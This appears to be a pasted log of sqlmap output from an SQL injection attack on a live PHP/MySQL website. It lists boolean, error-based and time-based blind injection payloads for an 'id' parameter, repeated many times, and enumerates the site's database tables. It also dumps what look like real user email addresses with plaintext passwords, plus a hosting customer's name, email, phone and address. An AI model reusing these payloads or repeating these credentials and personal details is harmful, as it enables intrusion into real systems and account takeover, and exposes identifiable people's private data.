  701. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  702.  
  703. Type: AND/OR time-based blind
  704. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  705. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  706. ---
  707. web application technology: Apache, PHP 5.4.39
  708. back-end DBMS: MySQL 5.0
  709. sqlmap resumed the following injection point(s) from stored session:
  710. ---
  711. Parameter: id (GET)
  712. Type: boolean-based blind
  713. Title: AND boolean-based blind - WHERE or HAVING clause
  714. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  715.  
  716. Type: error-based
  717. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  718. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  719.  
  720. Type: AND/OR time-based blind
  721. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  722. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  723. ---
  724. web application technology: Apache, PHP 5.4.39
  725. back-end DBMS: MySQL 5.0
  726. sqlmap resumed the following injection point(s) from stored session:
  727. ---
  728. Parameter: id (GET)
  729. Type: boolean-based blind
  730. Title: AND boolean-based blind - WHERE or HAVING clause
  731. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  732.  
  733. Type: error-based
  734. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  735. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  736.  
  737. Type: AND/OR time-based blind
  738. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  739. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  740. ---
  741. web application technology: Apache, PHP 5.4.39
  742. back-end DBMS: MySQL 5.0
  743. sqlmap resumed the following injection point(s) from stored session:
  744. ---
  745. Parameter: id (GET)
  746. Type: boolean-based blind
  747. Title: AND boolean-based blind - WHERE or HAVING clause
  748. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  749.  
  750. Type: error-based
  751. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  752. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  753.  
  754. Type: AND/OR time-based blind
  755. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  756. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  757. ---
  758. web application technology: Apache, PHP 5.4.39
  759. back-end DBMS: MySQL 5.0
  760. sqlmap resumed the following injection point(s) from stored session:
  761. ---
  762. Parameter: id (GET)
  763. Type: boolean-based blind
  764. Title: AND boolean-based blind - WHERE or HAVING clause
  765. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  766.  
  767. Type: error-based
  768. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  769. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  770.  
  771. Type: AND/OR time-based blind
  772. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  773. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  774. ---
  775. web application technology: Apache, PHP 5.4.39
  776. back-end DBMS: MySQL 5.0
  777. Database: blackkin_mothercomputer
  778. [6 tables]
  779. +---------------------------------------+
  780. | Human |
  781. | Human_Contact_No |
  782. | Human_MailID |
  783. | Review |
  784. | Software |
  785. | Web_Hosting |
  786. +---------------------------------------+
  787.  
  788. Database: information_schema
  789. [40 tables]
  790. +---------------------------------------+
  791. | CHARACTER_SETS |
  792. | COLLATIONS |
  793. | COLLATION_CHARACTER_SET_APPLICABILITY |
  794. | COLUMNS |
  795. | COLUMN_PRIVILEGES |
  796. | ENGINES |
  797. | EVENTS |
  798. | FILES |
  799. | GLOBAL_STATUS |
  800. | GLOBAL_VARIABLES |
  801. | INNODB_BUFFER_PAGE |
  802. | INNODB_BUFFER_PAGE_LRU |
  803. | INNODB_BUFFER_POOL_STATS |
  804. | INNODB_CMP |
  805. | INNODB_CMPMEM |
  806. | INNODB_CMPMEM_RESET |
  807. | INNODB_CMP_RESET |
  808. | INNODB_LOCKS |
  809. | INNODB_LOCK_WAITS |
  810. | INNODB_TRX |
  811. | KEY_COLUMN_USAGE |
  812. | PARAMETERS |
  813. | PARTITIONS |
  814. | PLUGINS |
  815. | PROCESSLIST |
  816. | PROFILING |
  817. | REFERENTIAL_CONSTRAINTS |
  818. | ROUTINES |
  819. | SCHEMATA |
  820. | SCHEMA_PRIVILEGES |
  821. | SESSION_STATUS |
  822. | SESSION_VARIABLES |
  823. | STATISTICS |
  824. | TABLES |
  825. | TABLESPACES |
  826. | TABLE_CONSTRAINTS |
  827. | TABLE_PRIVILEGES |
  828. | TRIGGERS |
  829. | USER_PRIVILEGES |
  830. | VIEWS |
  831. +---------------------------------------+
  832.  
  833. sqlmap resumed the following injection point(s) from stored session:
  834. ---
  835. Parameter: id (GET)
  836. Type: boolean-based blind
  837. Title: AND boolean-based blind - WHERE or HAVING clause
  838. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  839.  
  840. Type: error-based
  841. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  842. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  843.  
  844. Type: AND/OR time-based blind
  845. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  846. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  847. ---
  848. web application technology: Apache, PHP 5.4.39
  849. back-end DBMS: MySQL 5.0
  850. sqlmap resumed the following injection point(s) from stored session:
  851. ---
  852. Parameter: id (GET)
  853. Type: boolean-based blind
  854. Title: AND boolean-based blind - WHERE or HAVING clause
  855. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  856.  
  857. Type: error-based
  858. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  859. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  860.  
  861. Type: AND/OR time-based blind
  862. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  863. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  864. ---
  865. web application technology: Apache, PHP 5.4.39
  866. back-end DBMS: MySQL 5.0
  867. Database: blackkin_mothercomputer
  868. Table: Human_MailID
  869. [5 columns]
  870. +-----------+--------------+
  871. | Column | Type |
  872. +-----------+--------------+
  873. | Human_ID | int(11) |
  874. | ID | int(11) |
  875. | MailID | varchar(500) |
  876. | Passwords | varchar(500) |
  877. | Verified | bit(1) |
  878. +-----------+--------------+
  879.  
  880. sqlmap resumed the following injection point(s) from stored session:
  881. ---
  882. Parameter: id (GET)
  883. Type: boolean-based blind
  884. Title: AND boolean-based blind - WHERE or HAVING clause
  885. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  886.  
  887. Type: error-based
  888. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  889. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  890.  
  891. Type: AND/OR time-based blind
  892. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  893. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  894. ---
  895. web application technology: Apache, PHP 5.4.39
  896. back-end DBMS: MySQL 5.0
  897. Database: blackkin_mothercomputer
  898. Table: Human_MailID
  899. [7 entries]
  900. +----+----------------------------------+----------+----------+-----------+
  901. | ID | MailID | Human_ID | Verified | Passwords |
  902. +----+----------------------------------+----------+----------+-----------+
  903. | 1 | theblackkingdommailbox@gmail.com | 1 | \x01 | eragon |
  904. | 2 | support@mskenterprise.in | 2 | for | 12345 |
  905. | 3 | endeavourvignesh@gmail.com | 3 | \x01 | ucoa1061 |
  906. | 4 | ravivignesh3010@gmail.com | 4 | for | ucoa1061 |
  907. | 5 | vigneshj1893@gmail.com | 5 | \x01 | jx772882 |
  908. | 6 | simeonsteven@yahoo.com | 6 | for | simtess |
  909. | 7 | <blank> | 7 | for | <blank> |
  910. +----+----------------------------------+----------+----------+-----------+
  911.  
  912. sqlmap resumed the following injection point(s) from stored session:
  913. ---
  914. Parameter: id (GET)
  915. Type: boolean-based blind
  916. Title: AND boolean-based blind - WHERE or HAVING clause
  917. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  918.  
  919. Type: error-based
  920. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  921. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  922.  
  923. Type: AND/OR time-based blind
  924. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  925. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  926. ---
  927. web application technology: Apache, PHP 5.4.39
  928. back-end DBMS: MySQL 5.0
  929. Database: blackkin_mothercomputer
  930. Table: Human_MailID
  931. [5 columns]
  932. +-----------+--------------+
  933. | Column | Type |
  934. +-----------+--------------+
  935. | Human_ID | int(11) |
  936. | ID | int(11) |
  937. | MailID | varchar(500) |
  938. | Passwords | varchar(500) |
  939. | Verified | bit(1) |
  940. +-----------+--------------+
  941.  
  942. sqlmap resumed the following injection point(s) from stored session:
  943. ---
  944. Parameter: id (GET)
  945. Type: boolean-based blind
  946. Title: AND boolean-based blind - WHERE or HAVING clause
  947. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  948.  
  949. Type: error-based
  950. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  951. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  952.  
  953. Type: AND/OR time-based blind
  954. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  955. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  956. ---
  957. web application technology: Apache, PHP 5.4.39
  958. back-end DBMS: MySQL 5.0
  959. sqlmap resumed the following injection point(s) from stored session:
  960. ---
  961. Parameter: id (GET)
  962. Type: boolean-based blind
  963. Title: AND boolean-based blind - WHERE or HAVING clause
  964. Payload: id=1' AND 7660=7660 AND 'taLC'='taLC
  965.  
  966. Type: error-based
  967. Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  968. Payload: id=1' AND (SELECT 6533 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(6533=6533,1))),0x716b707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GQOV'='GQOV
  969.  
  970. Type: AND/OR time-based blind
  971. Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  972. Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Izcq) AND 'cmtV'='cmtV
  973. ---
  974. web application technology: Apache, PHP 5.4.39
  975. back-end DBMS: MySQL 5.0
  976. Database: blackkin_mothercomputer
  977. Table: Web_Hosting
  978. [1 entry]
  979. +----+-----------+------+------+------------+--------+------------------------+--------+---------+---------+------------+----------+-----------+-------------+------------+------------+-------------+--------------+--------------+
  980. | ID | FAX | Area | Name | Dates | State | Email | Status | Country | Address | Pincode | District | DiskSpace | DomainName | ContactNo1 | ContactNo2 | CompanyName | DiskSizetype | DomainNeedTo |
  981. +----+-----------+------+------+------------+--------+------------------------+--------+---------+---------+------------+----------+-----------+-------------+------------+------------+-------------+--------------+--------------+
  982. | 1 | 121235421 | aadz | abdo | 2016-04-09 | agadir | boughaliabdo@gmail.com | NULL | moroco | anadki | 0623862178 | anad | 1 | serveicanas | 02 | 02 | abid | GB | Buy |
  983. +----+-----------+------+------+------------+--------+------------------------+--------+---------+---------+------------+----------+-----------+-------------+------------+------------+-------------+--------------+--------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement